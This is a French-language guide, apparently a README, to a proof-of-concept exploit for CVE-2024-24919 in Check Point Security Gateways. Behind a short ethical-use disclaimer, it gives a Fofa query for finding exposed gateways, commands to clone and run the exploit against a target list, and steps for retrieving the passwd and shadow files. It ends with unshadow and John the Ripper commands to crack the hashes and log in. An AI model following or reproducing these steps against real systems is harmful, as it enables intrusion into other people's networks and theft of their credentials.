
POC - CVE-2024–24919 - Check Point Security Gateways
Permettant potentiellement à un attaquant de lire certaines informations sur les Check Point Security Gateways une fois connectées à Internet et activées avec les blades Remote Access VPN ou Mobile Access Software. Un correctif de sécurité qui atténue cette vulnérabilité est disponible.
En savoir plus — CVE-2024-24919
Avertissement : Cette preuve de concept (POC) est réalisée à des fins éducatives et de tests éthiques uniquement. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables des mauvais usages ou des dommages causés par ce programme.
Pour trouver des cibles potentielles, utilisez Fofa (similaire à Shodan.io) :
app=”Check_Point-SSL-Network-Extender”
Tout d'abord, clonez le dépôt :
git clone https://github.com/verylazytech/CVE-2024-24919
Ensuite, choisissez votre cible et ajoutez-la au fichier list.txt dans ce format :
Exécutez l'exploit :
python3 CVE-2024-24919.py -l list.txt
Il y a maintenant 2 options de sortie :
Échec :

Réussi :

Maintenant, après avoir trouvé les fichiers passwd et shadow, vous pouvez essayer de casser le hash avec JohnTheRipper. Après avoir exécuté l'exploit, vous avez 2 fichiers, passwd et shadow, vous pouvez donc les fusionner en un seul fichier et essayer de les casser (j'ai utilisé rockyou.txt mais cela peut être n'importe quelle liste de mots de passe) :
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Et maintenant, après avoir cassé le hash, nous pouvons nous connecter à l'utilisateur !